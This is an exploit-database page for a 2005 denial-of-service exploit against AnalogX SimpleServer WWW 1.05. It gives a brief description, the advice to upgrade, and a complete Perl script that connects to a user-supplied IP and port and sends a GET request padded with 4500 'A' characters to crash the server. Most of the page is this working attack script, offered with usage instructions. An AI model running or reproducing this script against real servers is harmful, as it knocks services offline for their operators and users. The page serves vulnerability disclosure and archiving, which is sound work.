header-logo
Suggest Exploit
vendor:
SimpleServer WWW
by:
Qnix
7.5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: SimpleServer WWW
Affected Version From: 01.05
Affected Version To: 01.05
Patch Exists: YES
Related CWE: N/A
CPE: a:analogx:simpleserver_www
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

AnalogX SimpleServer WWW 1.05 Dos Exploit

AnalogX SimpleServer WWW 1.05 is vulnerable to a Denial of Service attack. Sending a GET request with a large amount of data (4500 bytes) will cause the server to crash.

Mitigation:

Upgrade to the latest version of AnalogX SimpleServer WWW.
Source

Exploit-DB raw data:

#!/usr/bin/perl

use IO::Socket;

if (@ARGV <2)
 {
  print "\n ::: ---------------------------------------------- :::\n";
  print " ::: AnalogX SimpleServer WWW 1.05 Dos Exploit     :::\n";
  print " :::                                                :::\n";
  print " ::: Advisory : http://www.ussrback.com/labs45.html :::\n";
  print " ::: By       : Qnix  - Qnix[at]bsdmail[dot]org     :::\n";
  print " :::                                                :::\n";
  print " ::: Usage:  analogx_dos.pl [ip] [port]             :::\n";
  print " ::: ---------------------------------------------- :::\n";
  exit();
 }

$buf="A"x4500;
print "\n <+> Prepare to start connect.\n";
sleep(1);
$s = IO::Socket::INET->new(Proto=>"tcp",
                           PeerAddr=>$ARGV[0],
                           PeerPort=>$ARGV[1],
                           Timeout=>6
                           ) or die " <-> Target web server already DoSeD ??? or can't connect :(\n\n";
 $s->autoflush();

print " <+> Connected to $ARGV[0]:$ARGV[1]\n";
sleep(1);
print " <+> Sending the devil shit.\n";
sleep(1);
print $s "GET /$buf HTTP/1.1\n";

print " <+> Prepare to DoS with AAAAAA's .\n";
sleep(1);
close($s);

print " <+> Ok now target web server maybe DoSeD.\n\n";

# milw0rm.com [2005-07-07]